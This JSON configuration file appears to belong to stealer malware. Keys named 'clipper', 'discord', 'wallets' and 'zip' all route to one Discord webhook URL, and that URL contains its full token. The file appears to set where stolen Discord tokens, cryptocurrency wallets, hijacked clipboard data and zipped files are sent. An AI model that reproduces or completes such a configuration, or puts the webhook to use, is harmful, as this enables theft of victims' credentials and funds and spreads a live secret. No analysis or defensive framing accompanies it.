{
    "url": "https://discord.com/api/webhooks/823191488367951905/JTzPgND079-2vInTi9AXUeE_H7fVcXTa2LtA6kHa1ftdPoiAa8Dcc_WY5--QcjbtWV_2",
    "clipper": "https://discord.com/api/webhooks/823191488367951905/JTzPgND079-2vInTi9AXUeE_H7fVcXTa2LtA6kHa1ftdPoiAa8Dcc_WY5--QcjbtWV_2",
    "discord": "https://discord.com/api/webhooks/823191488367951905/JTzPgND079-2vInTi9AXUeE_H7fVcXTa2LtA6kHa1ftdPoiAa8Dcc_WY5--QcjbtWV_2",
    "wallets": "https://discord.com/api/webhooks/823191488367951905/JTzPgND079-2vInTi9AXUeE_H7fVcXTa2LtA6kHa1ftdPoiAa8Dcc_WY5--QcjbtWV_2",
    "zip": "https://discord.com/api/webhooks/823191488367951905/JTzPgND079-2vInTi9AXUeE_H7fVcXTa2LtA6kHa1ftdPoiAa8Dcc_WY5--QcjbtWV_2"
}
